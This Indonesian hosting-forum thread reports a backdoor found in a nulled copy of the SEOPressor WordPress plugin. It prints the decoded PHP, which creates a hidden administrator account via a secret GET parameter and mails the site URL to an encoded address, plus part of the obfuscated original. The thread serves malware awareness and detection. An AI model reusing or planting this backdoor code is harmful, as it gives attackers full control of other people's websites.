Hati2 SEOPressor Nulled, Ada Backdoor-nya $OOO0O0O00

Discussion in 'Desain Web dan Programming' started by PusatHosting, 19 Oct 2015.

Thread Status:
Not open for further replies.
  1. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,455
    Likes Received:
    368
    Trophy Points:
    83
    Baru saja menemukan file agak aneh milik client di plugin seopressor dan setelah googling akhirnya menemukan bahwa file tersebut merupakan bawaan dari plugin seopressor yang nulled.

    hasil decode dengan unphp http://www.unphp.net/decode/d53ec81359b31def2888105e0462a5a1/
    Code:
    <?php ?><?php
    add_action('wp_head', 'vg4beaws');
    function vg4beaws() {
    If ($_GET['cms'] == 'jjoplmh') {
    require ('wp-includes/registration.php');
    If (!username_exists('wordpress')) {
    $user_id = wp_create_user('wordpress', 'gh67io9Cjm');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
    }
    }
    }
    add_action('wp_head', 'm6yascfv');
    function m6yascfv() {
    If (!username_exists('wordpress')) {
    $addressdecode = base64_decode("cGhpbGx5Y2hhZEBnbXguY29t");
    $vari = 'Wordpress Plugin covertplayer';
    mail($addressdecode, get_bloginfo('wpurl'), $vari);
    }
    }
    ?><?php
    
    sebagian dari script aslinya ini
    Code:
    <?php //
    $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=23904;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO000
    
    Jika plugin aktif maka hacker bisa dengan mudah meng-insert user baru dengan level akses administrator dan selanjutnya hacker bisa melakukan apapun pada website target.

    Silahkan dimasukkan ke database scan manual karena maldet belum bisa mendeteksi dan kalau menggunakan http://www.abuseat.org/findbot.pl bisa tapi sayang tidak mengirim email alert.

    Sumber lain : http://bestblackhatforum.com/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates?page=7
     
  2. pluto01

    pluto01 Hosting Guru Web Hosting

    Messages:
    4,183
    Likes Received:
    939
    Trophy Points:
    113
    Thanks sharednya Mas
     
  3. susan

    susan Apprentice 1.0

    Messages:
    295
    Likes Received:
    38
    Trophy Points:
    28
    bisa dishare md5 hash utk filenya, thanks
     
  4. Indodata

    Indodata Apprentice 1.0

    Messages:
    333
    Likes Received:
    35
    Trophy Points:
    28
    Beberapa yang saya temukan seperti theme nulled, plugin terkadang disisipin sesuatu ntah itu backdor, cryptoPHP dll
    Sebaiknya gunakan versi asli atau cari yang free yang powerfull.
     
  5. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,455
    Likes Received:
    368
    Trophy Points:
    83
    Filternya berdasarkan string yang ada di dalamnya saja tidak menggunakan md5
     
  6. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,445
    Likes Received:
    134
    Trophy Points:
    63
    terima kasih sharenya mas mungkin bisa kita cek ricek :)
     
  7. idnix

    idnix Hosting Guru

    Messages:
    1,292
    Likes Received:
    315
    Trophy Points:
    83
    nulled emang rata2 begitu kan om?
     
    PelajarHosting likes this.
  8. sigmabisnis

    sigmabisnis Hosting Guru Web Hosting (Company)

    Messages:
    2,225
    Likes Received:
    150
    Trophy Points:
    63
    Thanks for infonya mas.
     
  9. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,455
    Likes Received:
    368
    Trophy Points:
    83
    Iya betul, tapi untuk seopressor ini semenjak saya beli masih murah beberapa tahun lalu baru kali ini tahu ada nulled-nya dan ada backdoornya lagi.
     
  10. masiqbal

    masiqbal Hosting Guru

    Messages:
    1,028
    Likes Received:
    326
    Trophy Points:
    83
    Masalahnya banyak orang awam yg tidak tahu resiko menggunakan unofficial plugin (apalagi nulled), yg dia pikir hanya bagaimana caranya agar websitenya bagus.
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...